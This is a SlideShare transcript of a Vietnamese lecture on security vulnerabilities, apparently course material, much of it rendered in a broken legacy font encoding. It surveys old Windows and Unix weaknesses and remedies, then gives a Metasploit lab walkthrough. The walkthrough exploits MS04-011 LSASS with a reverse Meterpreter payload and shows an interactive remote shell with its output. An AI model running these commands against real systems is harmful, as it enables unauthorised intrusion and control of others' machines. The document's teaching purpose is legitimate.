• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Lohong Buoi34
 

Lohong Buoi34

on

  • 375 views

 

Statistics

Views

Total Views
375
Views on SlideShare
375
Embed Views
0

Actions

Likes
0
Downloads
2
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Lohong Buoi34 Lohong Buoi34 Presentation Transcript

    • Lç hæng b¶o mËt (Security Holes)
    • PhÇn I: Mét sè vÊn ®Ò vÒ lç hæng b¶o mËt
    • I.Kh¸i niÖm vÒ lç hæng b¶o mËt
      • Lç hæng b¶o mËt lµ nh÷ng ®iÓm yÕu trªn hÖ thèng hoÆc Èn chøa trong mét dÞch vô mµ dùa vµo ®ã kÎ tÊn c«ng cã thÓ x©m nhËp tr¸i phÐp ®Ó thùc hiÖn c¸c hµnh ®éng ph¸ ho¹i hoÆc chiÕm ®o¹t tµi nguyªn bÊt hîp ph¸p.
    • II. Ph©n lo¹i læ hæng b¶o mËt
      • Lç hæng b¶o mËt ®­îc ph©n lµm 3 lo¹i c¬ b¶n:
      • - Lç hæng lo¹i A.
      • - Lç hæng lo¹i B.
      • - Lç hæng lo¹i C.
      • Lç hæng lo¹i C: c¸c lç hæng lo¹i nµy cho phÐp c¸c thùc hiÖn c¸c ph­¬ng thøc tÊn c«ng DoS. Møc ®é nguy hiÓm thÊp, ChØ ¶nh h­ëng tíi chÊt l­îng dÞch vô, cã thÓ lµm ng­ng trÖ gi¸n ®o¹n hÖ thèng, Kh«ng ph¸ háng d÷ liÖu hoÆc ®¹t ®­îc quyÒn truy cËp bÊt hîp ph¸p.
    • II. Ph©n lo¹i læ hæng b¶o mËt
      • Lç hæng lo¹i B: C¸c lç hæng lo¹i B cho phÐp ng­êi sö dông cã thªm c¸c quyÒn trªn hÖ thèng mµ kh«ng cÇn kiÓm tra tÝnh hîp lÖ nªn cã thÓ dÉn ®Õn mÊt m¸t hoÆc lé th«ng tin yªu cÇu b¶o mËt hÖ thèng.
      • Lç hæng lo¹i A: C¸c lç hæng nµy cho phÐp ng­êi sö dông ë ngoµi cã thÓ truy nhËp vµo hÖ thèng bÊt hîp ph¸p. Lç hæng nµy rÊt nguy hiÓm cã thÓ ph¸ vë toµn bé hÖ thèng.
    • III. Mét sè lç hæng th­êng gÆp trong c¸c hÖ ®iÒu hµnh
      • 1. HÖ ®iÒu hµnh Microsoft Windows
      • Lçi trªn c¸c dÞch vô th«ng tin Internet (IIS – Internet Information Service):
      • IIS rÊt dÔ x¶y ra t×nh tr¹ng mÊt an toµn ë 3 líp chÝnh nh­ sau:
        • Lçi xö lý c¸c yªu cÇu kh«ng ®­îc dù kiÕn tr­íc (Fail to handle Unanticipated Requests): NhiÒu IIS rÊt dÔ bÞ tÊn c«ng do xö lý kh«ng ®óng c¸c yªu cÇu HTTP ®· ®­îc ®Þnh d¹ng. Lîi dông ®iÓm yÕu nµy, kÎ tÊn c«ng tõ xa cã thÓ: Xem m· nguån cña c¸c kÞch b¶n øng dông, xem c¸c file bªn ngoµi cña th­ môc web gèc, xem c¸c file web server ®· x©y dùng nh­ng kh«ng cung cÊp, thùc thi c¸c lÖnh tuú tiÖn trªn server.
        • Lçi trµn bé ®Öm: NhiÒu ISAPI më réng (ASP, PRINTER, SSH…) rÊt dÔ bÞ tÊn c«ng trµn vïng ®Öm. Nh÷ng tÊn c«ng trµn vïng ®Öm sÏ gióp cho kÎ tÊn c«ng tõ xa ®¹t ®­îc nh÷ng môc ®Ých sau: Tõ chèi dÞch vô (DoS), thùc thi c¸c m· hoÆc c¸c lÖnh bÊt kú trªn ng÷ c¶nh cña ng­êi dïng cña web server.
        • C¸c øng dông mÉu: c¸c øng dông mÉu th­êng ®­îc thiÕt kÕ ®Ó gi¶i thÝch vai trß cña server nªn kh«ng cã kh¶ n¨ng chèng l¹i ®­îc c¸c tÊn c«ng vµ kh«ng cã dông ý phôc vô nh­ c¸c øng dông kh¸c. KÎ tÊn c«ng cã thÓ ghi ®Ì c¸c file tuú ý trªn server, cã thÓ thu thËp c¸c th«ng tin vÒ c¬ së d÷ liÖu ng­êi dïng.
      • C¸c thµnh phÇn truy nhËp d÷ liÖu Microsoft – C¸c dÞch vô d÷ liÖu tõ xa (Microsoft Data Access Components – Remote Data Services)
        • Thµnh phÇn truy nhËp d÷ liÖu tõ xa (RDS) trong c¸c phiªn b¶n cò cña thµnh phÇn truy nhËp d÷ liÖu Microsoft (MDAC) cã mét ch­¬ng tr×nh bÞ sai sãt cho phÐp ng­êi dïng tõ xa cã thÓ thùc thi c¸c lÖnh côc bé víi ®Æc quyÒn cña ng­êi qu¶n trÞ.
        • PhÇn lín c¸c hÖ ®iÒu hµnh Windows NT ch¹y IIS 3.0 hoÆc 4.0, Remote Data Service 1.5 vµ Visual Studio 6.0 ®Òu bÞ ¶nh h­ëng bëi sai sãt nµy
      • Microsoft SQL Server
        • Microsoft SQL Server chøa mét sè ®iÓm yÕu nghiªm träng cho phÐp kÎ tÊn c«ng tõ xa cã thÓ thu ®­îc nh÷ng th«ng tin mËt, söa ®æi néi dung c¬ së d÷ liÖu, lµm tæn th­¬ng ®Õn SQL Server, trong mét sè tr­êng hîp cã thÓ lµm tæn th­¬ng ®Õn m¸y chñ Server.
        • BÊt kú hÖ thèng Windows nµo cµi ®Æt MS SQL Server 7.0 hoÆc MS SQL Server 2000 hoÆc MS SQL Server Desktop Engine 2000 ®Òu bÞ ¶nh h­ëng bëi ®iÓm yÕu nµy.
      • NETBIOS – Unprotected Windows Networking shares
        • Microsoft Windows cung cÊp cho m¸y chñ kh¶ n¨ng chia sÎ c¸c file vµ th­ môc qua m¹ng víi c¸c m¸y chñ kh¸c qua tiÖn Ých Windows Network Shares. MÆc dï ®©y lµ ®iÓm m¹nh vµ h÷u Ých nh­ng nã l¹i ph« bµy c¸c file còng nh­ cung cÊp kü thuËt cho nh÷ng ng­êi dïng bÊt chÝnh cã thÓ lÊy quyÒn ®iÒu khiÓn hoµn toµn m¸y chñ. Mét trong nh÷ng c¸ch mµ virus Sircam vµ s©u m¹ng Nimda l©y lan nhanh chãng vµo mïa hÌ 2001 lµ t×m ra nh÷ng tµi nguyªn m¹ng dïng chung kh«ng ®­îc b¶o vÖ vµ ®­a vµo ®ã mét b¶n sao cña chÝnh nã.
        • TÊt c¶ c¸c hÖ ®iÒu hµnh MS Windows ®Òu bÞ ¶nh h­ëng bëi ®iÓm yÕu nµy.
      • Anonymous Logon – Null Session
        • KÕt nèi phiªn kh«ng hay ®¨ng nhËp nÆc danh lµ kü thuËt cho phÐp ng­êi dïng nÆc danh lÊy c¸c th«ng tin qua m¹ng (tªn ng­êi dïng, c¸c tµi nguyªn dïng chung) hoÆc truy nhËp mµ kh«ng cÇn x¸c thùc.
        • C¸c hÖ thèng Windows NT, XP vµ 2k ®Òu cã ®iÓm yÕu nµy.
      • X¸c thùc windows nãi chung – C¸c tµi kho¶n kh«ng mËt khÈu hoÆc mËt khÈu yÕu
        • MËt khÈu, c¸c m· an toµn th­êng ®­îc sö dông ®Ó t­¬ng t¸c gi÷a ng­êi dïng vµ hÖ thèng th«ng tin. PhÇn lín viÖc x¸c thùc ng­êi dïng, b¶o vÖ file d÷ liÖu ®Òu yªu cÇu ng­êi dïng cung cÊp mËt khÈu. V× nh÷ng truy nhËp x¸c thùc hîp lÖ kh«ng ®­îc ghi l¹i, thËm chÝ nÕu ®­îc ghi l¹i còng kh«ng bao giê g©y nghi ngê, nªn khi mËt khÈu bÞ lé sÏ lµ c¬ héi ®Ó ng­êi kh¸c kh¸m ph¸ hÖ thèng. Mét kÎ tÊn c«ng hoµn toµn cã thÓ truy nhËp ®Õn tµi nguyªn cã s½n cña ng­êi dïng nµo ®ã vµ cã thÓ trùc tiÕp cho phÐp c¸c kho¶n môc kh¸c cã thÓ truy nhËp ®Õn.
        • BÊt cø hÖ thèng nµo mµ ng­êi dïng ®­îc x¸c thùc b»ng UserID vµ Password ®Òu cã ®iÓm yÕu nµy.
      • Internet Explorer
        • MS Internet Explorer lµ tr×nh duyÖt mÆc ®Þnh ®­îc cµi ®Æt trong c¸c hÖ ®iÒu hµnh MS Windows. TÊt c¶ c¸c phiªn b¶n hiÖn ®ang tån t¹i ®Òu cã ®iÓm yÕu rÊt nguy hiÓm. §iÓm yÕu cã thÓ ®­îc lîi dông ®Ó ph¬i bµy c¸c Cookie, c¸c file hoÆc d÷ liÖu riªng, thùc thi c¸c ch­¬ng tr×nh riªng, t¶i xuèng hoÆc thùc thi c¸c m· lÖnh bÊt kú hoÆc tiÕp qu¶n toµn bé hÖ thèng.
      • Truy nhËp Registry tõ xa – (Remote Registry Access)
        • Trong hÖ thèng Windows sö dông Registry, lµ mét c¬ së d÷ liÖu cã vÞ trÝ trung t©m ®Ó qu¶n lý phÇn mÒm, cÊu h×nh thiÕt bÞ vµ qu¶n lý ng­êi dïng. C¸c thiÕt lËp an toµn vµ c¸c quyÒn hîp lÖ cã thÓ cho phÐp truy nhËp vµ Registry tõ xa. KÎ tÊn c«ng cã thÓ lîi dông ®Æc ®iÓm nµy ®Ó lµm tæn th­¬ng hÖ thèng hoÆc thiÕt lËp c¸c c¨n cø ®Ó chØnh söa c¸c quyÒn vµ c¸c liªn kÕt file cho phÐp c¸c m· ¸c ý.
        • TÊt c¶ c¸c phiªn b¶n cña MS Windows ®Òu cã ®iÓm yÕu nµy.
    • 2. Trªn hÖ ®iÒu hµnh Unix
      • C¸c lêi gäi thñ tôc tõ xa (Remote Procedure Calls - RPC)
        • Lêi gäi thñ tôc tõ xa cho phÐp mét ch­¬ng tr×nh trªn mét m¸y tÝnh thùc thi c¸c thñ tôc trªn mét m¸y tÝnh kh¸c b»ng c¸ch göi d÷ liÖu ®i vµ nhËn d÷ liÖu vÒ. V× thÕ RPC ®­îc sö dông rÊt réng r·i trong nhiÒu dÞch vô m¹ng nh­ qu¶n trÞ tõ xa, chia sÎ file … Tuy nhiªn, cã rÊt nhiÒu sai sãt trong RPC ®Ó kÎ tÊn c«ng cã thÓ lîi dông. Trong nhiÒu tr­êng hîp, RPC ®­îc thùc hiÖn víi ®Æc quyÒn lµ root (quyÒn qu¶n trÞ), kÕt qu¶ lµ hÖ thèng xuÊt hiÖn c¸c dÞch vô RPC dÔ bÞ nguy hiÓm cã thÓ cung cÊp cho kÎ tÊn c«ng víi quyÒn quy cËp root tõ xa kh«ng x¸c thùc.
        • TÊt c¶ c¸c hÖ thèng Unix vµ Linux cã cµi ®Æt dÞch vô RPC ®Òu bÞ ¶nh h­ëng cña ®iÓm yÕu nµy.
      • Apache Server
        • §©y lµ Web Server mÆc ®Þnh trong c¸c hÖ thèng Unix vµ Linux. Nh÷ng ng­êi qu¶n trÞ web cho r»ng Internet Information Server th­êng dÔ bÞ tæn th­¬ng nªn Apache Server hoµn toµn an toµn. Trong khi so s¸nh víi IIS, mÆc dï Apache xøng ®¸ng víi danh tiÕng an toµn, nh­ng nã vÉn kh«ng chøng tá ®­îc lµ kh«ng thÓ bÞ tÊn c«ng d­íi sù xem xÐt kü l­ìng.
        • GÇn nh­ tÊt c¶ c¸c hÖ thèng Unix vµ Linux ®Òu cã thÓ bÞ ¶nh h­ëng bëi nh÷ng yÕu ®iÓm cña Apache.
      • SSH (Secure Shell)
        • Shell an toµn lµ dÞch vô phæ biÕn cho viÖc ®¨ng nhËp an toµn, thùc thi c¸c lÖnh vµ truyÒn nhËn file qua m¹ng. PhÇn lín c¸c hÖ ®iÒu hµnh Unix ®Òu sö dông gãi phÇn mÒm m· nguån më OpenSSH. MÆc dï SSH an toµn h¬n nhiÒu so víi Telnet vµ Ftp nh­ng nhiÒu sai sãt vÉn ®­îc t×m thÊy trong khi thùc thi. PhÇn lín lµ c¸c lçi nhá vÒ an toµn nh­ng ®· ®­îc chØnh söa ngay lËp tùc. §iÒu nguy hiÓm nhÊt trong viÖc lîi dông c¸c lç hæng nµy lµ nã cho phÐp mét kÎ tÊn c«ng cã thÓ cã ®­îc quyÒn truy nhËp root trªn mét m¸y tõ xa.
        • TÊt c¶ c¸c hÖ ®iÒu hµnh Unix hoÆc Linux cµi ®Æt c¸c phiªn b¶n OpenSHH 3.3 hoÆc cò h¬n ®Òu chÞu ¶nh h­ëng cña ®iÓm yÕu nµy.
      • Giao thøc qu¶n lý m¹ng ®¬n gi¶n ( Simple Network Management Protocol -SNMP)
        • Giao thøc nµy ®­îc sö dông réng r·i ®Ó gi¸m s¸t tõ xa vµ cÊu h×nh hÇu nh­ tÊt c¶ c¸c thiÕt bÞ hiÖn ®¹i cho phÐp giao thøc TCP/IP. SNMP th­êng ®­îc sö dông lµ ph­¬ng ph¸p ®Ó cÊu h×nh vµ qu¶n lý c¸c thiÕt bÞ nh­ m¸y in, router, chuyÓn m¹ch, …, vµ cung cÊp d÷ liÖu vµo cho c¸c dÞch vô gi¸m s¸t m¹ng.
        • Sù truyÒn th«ng SNMP bao gåm viÖc trao ®æi c¸c lo¹i th«ng b¸o kh¸c nhau gi÷a c¸c tr¹m qu¶n lý SNMP vµ c¸c vµ nh÷ng thiÕt bÞ m¹ng. C¸ch thøc sö dông c¸c th«ng b¸o nµy vµ kü thuËt x¸c thùc trªn c¸c th«ng b¸o nµy ®Òu cã ®iÓm yÕu ®Ó cã thÓ khai th¸c mét c¸ch ®¸ng kÓ ®Ó kÎ tÊn c«ng cã thÓ lîi dông ®Ó cÊu h×nh l¹i hoÆc t¾t c¸c thiÕt bÞ tõ xa. ViÖc truyÒn th«ng SNMP ®­îc coi lµ sù béc lé sè l­îng lín c¸c cÊu tróc m¹ng còng nh­ c¸c thiÕt bÞ vµ hÖ thèng g¾n vµo nã. KÎ x©m nhËp sö dông c¸c th«ng tin nµy ®Ó lùa chän môc ®Ých vµ lËp kÕ ho¹ch tÊn c«ng.
      • DÞch vô truyÒn file (File Transfer Protocol -FTP)
        • FTP lµ dÞch vô dïng ®Ó ph©n phèi c¸c file cho c¸c ng­êi dïng nÆc danh hoÆc ®­îc x¸c thùc (b»ng username vµ password). Ng­êi dïng nÆc danh kh«ng cÇn cung cÊp mËt khÈu truy nhËp cho nªn tÊt c¶ c¸c ng­êi dïng ®Òu cã thÓ sö dông cïng mét tªn ®Ó ®¨ng nhËp (anonymous hoÆc ftp). C¸c dÞch vô Ftp yªu cÇu x¸c thùc cÇnph¶i cung cÊp username vµ password nh­ng nã l¹i truyÒn ®i d­íi d¹ng râ nªn rÊt dÔ bÞ lé trªn ®­êng truyÒn. NhiÒu sai sãt nguy hiÓm ®· ®­îc t×m ra trong dÞch vô nµy gióp cho kÎ tÊn c«ng cã thÓ giµnh ®­îc quyÒn truy nhËp root ®Ó truy nhËp vµ khai t¸c m¸y chñ Ftp Server.
      • DÞch vô R- Quan hÖ tin t­ëng (R-services – Trust Relationships)
        • Shell tõ xa (rsh), copy tõ xa (rcp), login tõ xa (rlogin) vµ thùc thi tõ xa (rexec) lµ c¸c lÖnh R (R-commands) ®­îc sö dông rÊt réng r·i trong thÕ giíi Unix. C¸c tæ chøc sö dông nhiÒu m¸y chñ Unix ®Òu sö dông dÞch vô R ®Ó cho phÐp c¸c user cã thÓ chuyÓn tõ m¸y nµy sang m¸y kh¸c mµ kh«ng cÇn ph¶i nhËp l¹i username vµ password mét lÇn n÷a. Khi quan hÖ tin cËy kh«ng ®­îc thiÕt lËp th× ng­êi dïng muèn ®¨ng nhËp ®Õn m¸y kh¸c b¾t buéc ph¶i göi username vµ password qua m¹ng do ®ã rÊt dÔ bÞ ®¸nh c¾p v× chóng ®­îc truyÒn ®i d­íi d¹ng râ. Khi quan hÖ tin cËy ®­îc thiÕt lËp th× kÎ tÊn c«ng cã thÓ gi¶ danh mét ng­êi dïng hîp lÖ trªn mét m¸y chñ hîp lÖ ®Ó truy nhËp vµ khai th¸c tµi nguyªn trªn tÊt c¶ c¸c m¸y kh¸c.
      • DÞch vô in Ên (Line Printer Daemon)
        • LPD lµ dÞch vô cho phÐp ng­êi dïng kÕt nèi ®Õn mét m¸y in côc bé tõ mét m¸y tÝnh côc bé hoÆc ë xa theo giao thøc TCP cæng 515. LPD lµ c¸ch phæ biÕn nhÊt ®Ó sö dông dÞch vô in trªn m¹ng trong c¸c hÖ thèng Unix vµ Linux. Tuy nhiªn nhiÒu LPD chøa c¸c sai sãt lËp tr×nh dÉn ®Õn lçi trµn bé ®Öm sau khi kÎ tÊn c«ng ch¹y c¸c m· ¸c ý víi ®Æc quyÒn root.
      • Göi th­ (Sendmail)
        • Sendmail lµ ch­¬ng tr × nh göi, nhËn, göi chuyÓn tiÕp phÇn lín c¸c th­ ®iÖn tö ®­îc xö lý trªn c¸c m¸y tÝnh Unix vµ Linux. Víi viÖc Sendmail ®­îc sö dông réng r·i trªn Internet nªn nã lµ môc tiªu cho nhiÒu kÎ tÊn c«ng trong nhiÒu n ¨ m qua.
        • C¸c rñi ro gÆp ph ¶ i ®èi víi Sendmail th­êng lµ hai d¹ng chÝnh: sù leo thang ®Æc quyÒn g©y ra do trµn bé ®Öm vµ viÖc cÊu h × nh kh«ng thÝch hîp cho phÐp m¸y tÝnh cña b¹n lµ mét ca (relay) cho c¸c th­ ®iÖn tö tõ c¸c m¸y kh¸c
      • BIND/DNS
        • C¸c gãi Berkeley Internet Name Domain (BIND) lµ sù thùc thi cña Domain Name Service (DNS) ®­îc sö dông réng r·i nhÊt - hÖ thèng cho phÐp x¸c ®Þnh vÞ trÝ cña server trªn Internet (hoÆc m¹ng côc bé) b»ng c¸ch sö dông tªn (vÝ dô www.yahoo.com) mµ kh«ng cÇn ph ¶ i biÕt râ ®Þa chØ IP cña chóng. Sù cã mÆt ë kh¾p mäi n¬i cña BIND ®· lµm cho nã th­êng xuyªn lµ ®Ých cña c¸c cuéc tÊn c«ng. Trong khi c¸c nhµ ph¸t triÓn BIND ®· cã lÞch sö söa c¸c ®iÓm yÕu rÊt nhanh th × mét sè l­îng bÊt th­êng ®· lçi thêi hoÆc c¸c server ®­îc cÊu h × nh sai vÉn cßn vµ ®ang ph« bµy ra cho c¸c cuéc tÊn c«ng.
        • Cã mét sè nh©n tè ®ãng gãp vµo t × nh tr¹ng nµy. Nh©n tè chñ yÕu thuéc vÒ nh ÷ ng ng­êi qu ¶ n trÞ-nh ÷ ng ng­êi ®· kh«ng biÕt c¸c n©ng cÊp an toµn, c¸c hÖ thèng ch¹y BIND deamon (®­îc gäi lµ “named”) kh«ng cÇn thiÕt vµ c¸c file cÊu h × nh sai. Nh ÷ ng ®iÒu nµy cã thÓ mang ®Õn viÖc tõ chèi dÞch vô, trµn bé ®Öm hoÆc huû ho¹i DNS cache. § iÓm yÕu cña BIND ®­îc ph¸t hiÖn ra gÇn ®©y nhÊt lµ tõ chèi dÞch vô. Trong tr­êng hîp nµy kÎ tÊn c«ng cã thÓ göi c¸c gãi DNS riªng b¾t buéc kiÓm tra tÝnh v ÷ ng ch¾c bªn trong, chç dÔ bÞ tÊn c«ng vµ sÏ lµm t¾t BIND deamon. Mét kiÓu kh¸c lµ tÊn c«ng trµn bé ®Öm trong ®ã kÎ tÊn c«ng tËn dông sù thùc thi yÕu cña c¸c th­ viÖn thiÕt bÞ gi ¶ i DNS. B»ng c¸ch göi c¸c ®¸p øng DNS ¸c ý kÎ tÊn c«ng cã thÓ th ¨ m dß ®iÓm yÕu nµy vµ thùc thi c¸c m· tuú ý hoÆc thËm chÝ g©y ra tõ chèi dich vô
      • Sù x¸c thùc Unix nãi chung- C¸c tµi kho ¶ n kh«ng mËt khÈu hoÆc mËt khÈu yÕu (General Windows Authentication -- Accounts with No Passwords or Weak Passwords)
        • § èi víi hÖ ®iÒu hµnh Unix còng cã ®iÓm yÕu trong viÖc x¸c thùc nãi chung vµ c¸c tµi kho ¶ n kh«ng mËt khÈu hoÆc mËt khÈu yÕu gièng nh­ ®èi víi hÖ ®iÒu hµnh Microsoft Windows ®· tr × nh bµy ë trªn
    • III. Nguyªn nh©n xuÊt hiÖn lç hæng b¶o mËt
      • 1. C¸c lç hæng tõ hÖ ®iÒu hµnh vµ c¸c øng dông
      • C¸c vÊn ®Ò vÒ t©m lý
        • Khi viÕt mét ch­¬ng tr×nh phÇn mÒm, ng­êi x©y dùng ch­¬ng tr×nh ph¶i ®Æt ra tÊt c¶ c¸c kh¶ n¨ng (thùc hiÖn ®­îc vµ kh«ng thùc hiÖn ®­îc) ®Ó cã ph­¬ng h­íng kh¾c phôc lçi vµ th«ng b¸o lçi
      • C¸c lç hæng sinh ra do thay ®æi vai trß (change of role hole).
        • RÊt nhiÒu xuÊt ph¸t tõ viÖc ch¹y c¸c ch­¬ng tr×nh trong c¸c m«i tr­êng kh¸c nhau.
      • C¸c lç hæng trµn bé ®Öm: Trµn bé ®Öm xuÊt hiÖn trong mét sè tr­êng hîp:
        • Khi ®äc d÷ liÖu trùc tiÕp vµo vïng ®Öm
        • Khi copy d÷ liÖu tõ vïng ®Öm lín sang vïng ®Öm nhá h¬n
        • Khi thùc hiÖn xö lý d÷ liÖu kh¸c trªn vïng ®Öm cña x©u.
      • Sù uû quyÒn nhÇm lÉn
        • NhiÒu khi sù thay ®æi tªn file sÏ lµm thay ®æi kiÓu cña file dÉn ®Õn viÖc thay ®æi c¸c ®Æc quyÒn trªn c¸c file ®ã.
      • Lçi më hoÆc ®ãng (fail –open or - closed): PhÇn lín c¸c hÖ thèng nh¹y c ¶ m vÒ an toµn kh«ng thùc hiÖn ®óng trong mét sè tr­êng hîp. Chóng th­êng gÆp lçi trong 2 tr­êng hîp sau:
        • Cho phÐp truy cËp trong khi kh«ng cÇn cho phÐp truy nhËp. § iÒu nµy ®­îc gäi lµ lçi më (fail-open)
        • Tõ chèi truy cËp trong khi kh«ng cÇn tõ chèi truy nhËp. § iÒu nµy ®­îc gäi lµ lçi ®ãng (fail-closed)
      • ThiÕu tµi nguyªn (Resource starvation)
      • Tin t­ëng nh ÷ ng nguån kh«ng ®¸ng tin cËy (Trusting untrustworthy channels)
      • Ranh giíi an toµn lín (Big interfaces)
      • Ýt møc an toµn
    • 2. VÊn ®Ò ®èi víi ng­êi sö dông
      • Ngoµi nguyªn nh©n do hÖ ®iÒu hµnh vµ øng dông chøa c¸c lçi g©y ra c¸c lç hæng b ¶ o mËt nh­ ®· ®Ò cËp ë trªn, c¸c lçi hæng b ¶ o mËt cßn xuÊt hiÖn do c¸c nguyªn nh©n sau :
      • M¹ng vµ m¸y chñ bÞ cÊu h × nh sai
      • Nhµ cung cÊp thiÕu tr¸ch nhiÖm
      • ThiÕu nh ÷ ng c¸ nh©n cã tr × nh ®é
    • IV. Ph¸t hiÖn lç hæng b¶o mËt
      • §Ó ph¸t hiÖn vµ t×m ra c¸c lç hæng b¶o mËt, ng­êi ta sö dông c¸c ch­¬ng tr×nh t×m kiÕm vµ ph¸t hiÖn c¸c lç hæng b¶o mËt, vÝ dô:
        • Nessus (Linux)
        • Snort (Linux)
        • HFNETCHK (Windows)
        • Inforsec scanner (Windows)
        • Windows Update
    • V. C¸ch kh¾c phôc c¸c lç hæng
      • N©ng cÊp hÖ ®iÒu hµnh
      • Sö dông phÇn mÒm diÖt virus
      • Ngõng chia sÎ file
      • V« hiÖu ho¸ c¸c Script Hosting.
      • Sö dông Firewall, c¸c ch­¬ng tr×nh ph¸t hiÖn vµ chèng x©m nhËp tr¸i phÐp
      • Sö dông miÕng v¸ (patches)
    • PhÇn II: Thùc hµnh mét sè phÇn mÒm quÐt lç hæng
      • Mét sè ch­¬ng tr×nh quÐt lç hæng
        • Windows Update
        • Security Holes Scanner
        • Infosec Scanner
        • nessus
      • Thùc hµnh khai th¸c vµo lç hæng
        • Metasploit
    • II. PhÇn mÒm Metasploit
      • Giíi thiÖu
      • Cµi ®Æt
      • Có ph¸p
      • Mét sè tuú chän
      • C¸c vÝ dô
    • 1 . Giíi thiÖu
      • Metasploit Framework lµ mét m«i tr­êng dïng ®Ó kiÓm tra, tÊn c«ng vµ khai th¸c lçi cña c¸c dÞch vô. Metasploit cã thÓ ch¹y trªn hÇu hÕt c¸c hÖ ®iÒu hµnh Linux, windows. Ta cã thÓ download ch­¬ng tr×nh t¹i www.metasploit.com
    • 2. Cµi ®Æt
      • Truy nhËp vµo th­ môc chøa bé cµi cña Metasploit, ch¹y file Framework-2.4.exe
      • Theo c¸c chØ dÉn trªn mµn h×nh
    • 3. Sö dông metasploit
      • Metasploit cã thÓ ch¹y trªn 2 chÕ ®é: ChÕ ®é dßng lÖnh (Console) vµ chÕ ®é giao diÖn web (Web interface)
      • C¸ch thùc hiÖn:
      • Start  Programs  Metasploit Framework  MFSConsole
      • Thùc hiÖn c¸c lÖnh cña metasploit:
    • a. Chän module exploit
      • Lùa chän ch­¬ng tr×nh, dÞch vô lçi mµ metasploit cã thÓ hç trî ®Ó khai th¸c
        • show exploits : xem các module exploit mà framework có hỗ trợ
        • use exploit_name : chọn module exploit
        • info exploit_name : xem thông tin về module exploit
      • Ta nên cập nhật thường xuyên các lỗi dịch vụ trên www.metasploit.com
    • b. CÊu h×nh cho module exploit ®· chän
      • show options: Xác định những options nào cần cấu hình
      • set : cấu hình cho những option của module đó
    • c. X¸c nhËn l¹i nh÷ng options võa cÊu h×nh
      • check : kiểm tra xem những option đã được set chính xác chưa.
    • d. Lùa chän target
      • Lùa chän hÖ ®iÒu hµnh nµo ®Ó thùc hiÖn
        • show targets : những target được cung cấp bởi module đó
        • set : xác định target nào
        • vd: mfs> use windows_ssl_pct
        • show targets
        • exploit sẽ liệt kê ra những target như: winxp, winxp SP1, win2000, win2000 SP1
    • e. Lùa chän payload ®Ó thùc hiÖn
      • payload là đoạn code mà sẽ chạy trên hệ thống remote machine
        • show payloads : liệt kê ra những payload của module exploit hiện tại
        • info payload_name : xem thông tin chi tiết về payload đó
        • set PAYLOAD payload_name : xác định payload module name.
    • f. Thùc thi exploit
      • exploit : lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho bạn những thông tin về hệ thống được khai thác
    • VÝ dô
      • Máy localhost có địa chỉ 192.168.1.1 sẽ tấn công máy remote có địa chỉ 192.168.1.2 thông qua lỗi Lsass_ms04_011. Đây là lỗi tràn stack trong dịch vụ LSA( Local Security Authority).Lsass.exe là một process của hệ thống Microsoft Windows, chịu trách nhiệm về chứng thực local security, quản lý Active Directory và các chính sách login. Lsass kiểm sóat việc chứng thực của cả client và server.
      • Msf>use Lsass_ms04_011
      • Msf>set PAYLOAD win32_reverse_meterpreter
      • Msf>set RHOST 192.168.1.2
      • Msf>set LHOST 192.168.1.1
      • Msf>exploit
      • Meterpreter> help
      • Meterpreter>use -m Process //add thêm tập lệnh của process
      • Meterpreter>help // xem các lệnh meterpreter hỗ trợ
      • Meterpreter>ps // list các process mà remote machine đang chạy
      • Meterpreter>kill // tắt các process mà remote machine đang chạy
      • Meterpreter> execute -f cmd –c // tấn công sử dụng comandline cmd của remote machine
        • execute: success, process id is 3516.
        • execute: allocated channel 1 for new process.
      • meterpreter> interact 1
        • interact: Switching to interactive console on 1...
        • interact: Started interactive channel 1.
        • Microsoft Windows XP [Version 5.1.2600]
        • (C) Copyright 1985-2001 Microsoft Corp.
        • C:WINDOWS>echo Meterpreter interactive channel in action
        • echo Meterpreter interactive channel in action
        • Meterpreter interactive channel in action
      • C:WINDOWS> ipconfig
        • Caught Ctrl-C, close interactive session? [y/N] y
      • meterpreter>
    • PhÇn mÒm quÐt lç hæng b¶o mËt:
      • 1. Nessus
        • 1.1. CÊu tróc ch­¬ng tr×nh
      • Nessus gåm hai phÇn: nessus client vµ nessus server (nesssusd) . PhÇn server b¾t buéc ph¶i cµi ®Æt vµ thùc thi trªn mét hÖ thèng Linux, cßn phÇn client cã thÓ ch¹y trªn mét m¸y Linux hoÆc Windows.
        • 1.2. Cµi ®Æt ch­¬ng tr×nh
      • §Ó cµi ®Æt Nessus trªn mét hÖ thèng m¸y tùa Unix chóng ta cÇn cã bèn file sau:
      • - nessus-libraries-x.x.tar.gz
      • - libnasl-x.x.tar.gz
      • - nessus-core.x.x.tar.gz
      • nessus-plugins.x.x.tar.gz
      • Tr­íc hÕt cÇn gi¶i nÐn c¸c file trªn ®Ó ®­îc c¸c th­ môc t­¬ng øng, sau ®ã tiÕn hµnh cµi ®Æt theo thø tù sau:
      • *Cµi ®Æt nessus-libraries
      • - ChuyÓn vµo th­ môc nessus-libraries
      • cd nessus-libraries
      • - Ch¹y configure
      • ./configure
      • - Thùc thi make vµ make install
      • make
      • make install
      • * Cµi ®Æt libnasl: T­¬ng tù nh­ cµi ®Æt nessus-libraries
      • cd libnasl
      • ./configure
      • make
      • make install
      • * Sau ®ã cµi ®Æt nessus-core nessus-plugins theo tr×nh tù nh­ trªn
      • Chó ý:
      • NÕu cµi ®Æt trªn hÖ thèng Linux th× trong file /etc/ld.so.conf cÇn cã thªm /usr/local/lib , sau ®ã t¹i dßng lÖnh gâ ldconfig.
      • NÕu øng dông client kh«ng muèn sö dông ë chÕ ®é GTK, ta cã thÓ sö dông ë chÕ ®é dßng lÖnh b»ng c¸ch thªm tuú chän -- disable-gtk khi x©y dùng nessus-core nh­ sau:
      • cd nessus-core ; ./configure --disable-gtk ; make && make install
        • 1.3.CÊu h×nh vµ ch¹y thö
      • Sau khi ®· tiÕn h×nh cµi ®Æt nh­ trªn, chóng ta tiÕn hµnh cÊu h×nh nessusd vµ nessus client nh­ sau:
      • * CÊu h×nh nessus server (nessusd):
